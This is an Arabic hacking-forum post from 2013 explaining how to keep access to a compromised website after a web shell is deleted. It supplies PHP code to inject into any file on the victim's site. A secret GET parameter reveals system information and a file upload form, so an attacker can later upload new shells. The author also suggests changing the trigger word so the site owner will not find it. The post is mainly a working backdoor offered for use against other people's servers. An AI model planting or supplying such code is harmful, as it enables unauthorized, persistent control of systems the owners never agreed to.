development-point

development-point (https://vb.development-point.com/index.php)
-   قسم اختراق المواقع والسيرفرات (https://vb.development-point.com/forumdisplay.php?f=44)
-   -   حقن مركز رفع في أي ملف php (https://vb.development-point.com/showthread.php?t=20152)

box 11-16-2013 02:51 AM

حقن مركز رفع في أي ملف php
 
بسم الله الرحمن الرحيم

السلام عليكم ورحمه الله وبركاته
______________________________

احيان ترفع شل على سيرفر معين..وتكون منت فاضي له ! .. وتبغى ترجع له بعدين لكن احتمال كبير راعي الموقع يشوف الشل ويحذفه !

لذلك .. اليوم عندي طريقه يمكن البعض ما تخطر ببالهم..
وهي:
حقن كود مركز رفع في متغيرGET .. وذلك للرجوع للموقع في وقت لاحق..


تفتح أي ملفphpبالموقع وتحط هذا الكود::
كود PHP:
if($_GET['upload'] == "mcprof"){

echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>The File Has Been Uploaded !!</b><br><br>'; }
else { echo '<b>an Error !!</b><br><br>'; }
}
}

لاستعراض مركز الرفع:
كود PHP:

domain.com>رابط الموقع
file.php> الملف اللي حطيت فيه الكود

والافضل انك تغير قيمه mcprofالى كلمه اصعب عشان محد يلقاه بالصدفهhttp://vb.ehcommunity.com/images/icons/icon10.gif

والسلام عليكم >>


الساعة الآن 03:47 AM

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47